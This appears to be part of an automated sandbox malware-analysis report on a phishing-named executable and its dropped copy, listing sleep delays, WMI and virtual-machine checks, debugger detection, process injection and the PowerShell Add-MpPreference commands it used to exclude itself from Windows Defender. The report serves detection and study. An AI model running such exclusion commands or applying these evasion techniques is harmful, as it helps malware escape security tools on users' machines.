Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7536	Thread sleep time: -12912720851596678s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7720	Thread sleep count: 3184 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7720	Thread sleep count: 6670 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -599104s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -598981s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -598875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -598765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -598656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -598545s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -598426s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -598297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -598172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -598062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -597953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -597844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -597719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -597609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -597500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -597391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -597281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -597172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -597062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -596951s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -596844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -596734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -596625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -596515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -596406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -596297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -596187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -596078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -595968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -595859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -595750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -595641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -595531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -595422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -595312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -595203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -595094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -594963s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -594844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -594734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -594625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 7688	Thread sleep time: -594516s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7588	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep count: 32 > 30
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 8004	Thread sleep count: 1455 > 30
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 8004	Thread sleep count: 8390 > 30
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -599534s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -599421s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -599312s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -599203s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -599094s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -598982s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -598875s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -598765s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -598656s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -598546s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -598437s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -598328s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -598218s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -598109s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -598000s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -597890s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -597781s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -597671s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -597562s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -597453s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -597344s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -597220s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -597109s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -597000s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -596890s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -596781s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -596672s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -596547s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -596437s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -596328s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -596189s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -596078s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -595968s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -595847s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -595734s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -595625s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -595515s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -595406s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -595297s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -595176s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -595047s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -594937s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -594828s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -594718s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -594609s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -594500s >= -30000s
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996	Thread sleep time: -594390s >= -30000s

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 599104	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 598981	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 598545	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 598426	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 598062	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 597391	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 597062	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 596951	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 596734	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 596625	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 596515	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 596406	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 596297	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 596187	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 595968	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 595422	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 594963	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 594516	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 599534
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 599421
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 599312
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 599203
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 598982
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 598875
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 598765
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 598656
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 598546
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 598437
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 598328
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 598218
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 598109
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 598000
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 597890
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 597781
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 597671
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 597562
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 597453
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 597344
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 597220
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 597109
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 597000
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 596890
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 596781
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 596672
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 596547
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 596437
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 596328
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 596189
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 596078
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 595968
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 595847
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 595734
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 595625
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 595515
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 595406
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 595297
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 595176
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 595047
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 594937
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 594828
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 594718
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 594609
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 594500
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 594390

Source: EQVRGq.exe, 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: EQVRGq.exe, 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Wire slip account payable.pif.exe, 00000000.00000002.1746285908.00000000077C0000.00000004.08000000.00040000.00000000.sdmp, Wire slip account payable.pif.exe, 00000000.00000002.1740228748.0000000003FB8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: H8vhGFSYAQ
Source: EQVRGq.exe, 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
Source: Wire slip account payable.pif.exe, 00000008.00000002.4157630199.0000000000EFF000.00000004.00000020.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4158328138.000000000149C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe

Code function: 8_2_011B7050 CheckRemoteDebuggerPresent,

8_2_011B7050

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Wire slip account payable.pif.exe"
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EQVRGq.exe"
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Wire slip account payable.pif.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EQVRGq.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Memory written: C:\Users\user\Desktop\Wire slip account payable.pif.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Memory written: C:\Users\user\AppData\Roaming\EQVRGq.exe base: 400000 value starts with: 4D5A			Jump to behavior

